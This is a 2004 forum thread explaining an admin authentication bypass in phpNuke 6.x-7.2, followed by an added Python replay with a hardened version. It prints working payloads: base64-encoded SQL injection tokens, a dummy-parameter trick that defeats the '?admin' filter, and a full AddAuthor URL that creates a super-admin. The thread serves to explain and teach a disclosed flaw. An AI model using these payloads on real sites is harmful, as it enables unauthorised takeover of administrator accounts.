Admin-level authentication bypass in phpnuke 6.x-7.2

Posted: Sun May 23, 2004 8:46 am
$t3
Regular user
Joined: May 19, 2004
Posts: 15
Hmm, I have one problem...
I don't understand how to get this code:
eCcgVU5JT04gU0VMRUNUIDEvKjox
The full string is
admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
** It is in this tutorial **
Code:
    http://www.waraxe.us/?modname=sa&id=018
Sorry for my bad English!
Thanks, man
My Explanation

Posted: Sun May 23, 2004 9:15 am
icenix
Advanced user
Joined: May 13, 2004
Posts: 106
Location: Australia
My field is basically security in general, but PHP isn't really my thing (though I'm learning).
Basically, it's because of:
Code:
    $admintest = 0;
    if(isset($admin) && $admin != "") {
        // the client-supplied value is decoded and split on ":"
        // into an author id and a password, with no escaping
        $admin = base64_decode($admin);
        $admin = explode(":", $admin);
        $aid = "$admin[0]";
        $pwd = "$admin[1]";
    }
because $admin base64_decodes itself...
He "constructs" a base64 message which is "x'%20OR/*:y",
which ends up being "eCcgT1IvKjp5".
The second bit he goes on to explain is the filter that PHPNuke uses to filter out naughty commands from users who try to hack something,
which is:
Code:
    if (preg_match("/\?admin/", "$checkurl")) {
        echo "die";
        exit;
    }
That truly sucks because, as he said, it's very limited.
i.e. all it blocks is:
Code:
    http://localhost.com/admin.php*
(note the wildcard, which means everything after it.)
So how he bypasses this is by adding something totally useless.
Therefore:
Code:
    http://localhost.com/admin.php?foo=bar&admin=eCcgT1IvKjp5
Then the message
Code:
    "Selection from database failed!"
basically just proves his point that there's an SQL injection here, and he just didn't pass any commands...
Code:
    http://localhost.com/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo@bar.com&add_radminsuper=1
is the code that admins use for adding a user and making him an admin... just all in one string...
Code:
    x'%20UNION%20SELECT%201/*:1
which after base64 encoding gives us "eCcgVU5JT04gU0VMRUNUIDEvKjox"
is just used for bypassing the auth.
It can be done because of a flaw in the script,
specifically:
Code:
    $pwd = "$admin[1]";
where it pulls the cookie from the user. It has a [1] after it...
and by "comparing the two strings" it gives us an OK.
((Basically it's saying... is there a 1 there? If so... authentication is OK.))
So now that we have bypassed the admin login,
we can pretty much do whatever we want.
So instead of passing commands through a modified "online" cookie,
why not just add ourselves a user?
I really hope I helped, and waraxe could explain this better.
Give me some feedback on how I went explaining this, hehe.
PHP isn't really my thing yet.
How did I go, Janek??? If I'm totally wrong I will just delete my post... I don't want to confuse anyone; I'm learning here too.
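The whole chain icenix walks through (the base64 "aid:pwd" token, the error from the `x' OR/*` probe, the UNION bypass, and the `?admin` filter that `?foo=bar&` sidesteps), replayed as an added Python example. This is not code from the thread or from phpNuke: it assumes a `nuke_authors(aid, pwd)` table and a `SELECT pwd ... WHERE aid='$aid'` lookup (the page never shows the query, only the payloads that break it), uses an in-memory SQLite database in place of MySQL (both treat an unterminated `/*` as a comment running to the end of the statement), and puts a hardened check next to the flawed one.

```python
"""Added example, not code from the thread or from phpNuke: a model of the
admin.php token check so the advisory's steps can be replayed offline.
Assumed: table nuke_authors(aid, pwd) and the query shape WHERE aid='$aid'."""
import base64
import hashlib
import hmac
import re
import sqlite3

# URL copied from the thread; the token at the end is "x' UNION SELECT 1/*:1"
ADD_AUTHOR_URL = ("http://localhost.com/admin.php?op=AddAuthor&add_aid=waraxe2"
                  "&add_name=God&add_pwd=coolpass&add_email=foo@bar.com"
                  "&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox")

# Constructed sample data: the stored pwd is an MD5 hex digest, as phpNuke kept it
LEGIT_PWD_HASH = hashlib.md5(b"coolpass").hexdigest()


def encode_admin_token(aid: str, pwd: str) -> str:
    """Build the 'admin' value the script expects: base64("aid:pwd")."""
    return base64.b64encode(f"{aid}:{pwd}".encode()).decode()


def decode_admin_token(token: str) -> tuple[str, str]:
    """Mirror of base64_decode + explode(":") + $admin[0] / $admin[1]."""
    parts = base64.b64decode(token).decode("latin-1").split(":")
    pwd = parts[1] if len(parts) > 1 else ""   # PHP: undefined index -> ""
    return parts[0], pwd


def url_filter_blocks(url: str) -> bool:
    """phpNuke's check, preg_match("/\\?admin/", $checkurl): it fires only
    when 'admin' directly follows the '?', i.e. is the first parameter."""
    return re.search(r"\?admin", url) is not None


def make_db() -> sqlite3.Connection:
    """One super-admin row, constructed for the example."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE nuke_authors (aid TEXT, pwd TEXT)")
    db.execute("INSERT INTO nuke_authors VALUES (?, ?)", ("God", LEGIT_PWD_HASH))
    return db


def vulnerable_admintest(db: sqlite3.Connection, token: str) -> tuple[int, str]:
    """The flawed check: $aid is interpolated straight into the SQL."""
    aid, pwd = decode_admin_token(token)
    sql = f"SELECT pwd FROM nuke_authors WHERE aid='{aid}'"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:            # the "x' OR/*" probe lands here
        return 0, "Selection from database failed!"
    if row is None:
        return 0, "no such author"
    # PHP's loose ==: the UNION-selected integer 1 equals the string "1"
    if str(row[0]) == pwd and pwd != "":
        return 1, "ok"
    return 0, "bad password"


def hardened_admintest(db: sqlite3.Connection, token: str) -> int:
    """Same logic with a bound parameter and a constant-time comparison."""
    aid, pwd = decode_admin_token(token)
    row = db.execute("SELECT pwd FROM nuke_authors WHERE aid=?", (aid,)).fetchone()
    if row is None or not pwd:
        return 0
    return 1 if hmac.compare_digest(row[0].encode(), pwd.encode("latin-1")) else 0


if __name__ == "__main__":
    db = make_db()
    probe = encode_admin_token("x' OR/*", "y")                  # eCcgT1IvKjp5
    bypass = encode_admin_token("x' UNION SELECT 1/*", "1")     # eCcgVU5JT04gU0VMRUNUIDEvKjox
    print("probe  :", probe, vulnerable_admintest(db, probe))
    print("bypass :", bypass, vulnerable_admintest(db, bypass),
          "hardened:", hardened_admintest(db, bypass))
    print("filter on ?admin=...        :", url_filter_blocks("http://localhost.com/admin.php?admin=" + probe))
    print("filter on ?foo=bar&admin=...:", url_filter_blocks(ADD_AUTHOR_URL))
```

The bypass works because the UNION branch supplies both halves of the comparison: the script compares whatever the query returned (the attacker's `1`) against `$admin[1]` (also `1`). Binding `aid` as a parameter removes the injection outright; the `?admin` regex was never a defence, since it only matches when `admin` is the first query parameter.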
Posted: Sun May 23, 2004 1:39 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Yes, icenix, you are right with your answers.
By the way, I will make a base64 encoder/decoder
and MD5 hasher publicly available, so anyone can play with those PHP functions
without actually needing to do any PHP programming. Stay tuned!
Thanks :)

Posted: Sun May 23, 2004 6:37 pm
$t3
Regular user
Joined: May 19, 2004
Posts: 15

base64 encoder/decoder
and MD5 hasher
COOL
Thanks icenix
Thanks waraxe
Posted: Tue May 25, 2004 10:30 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu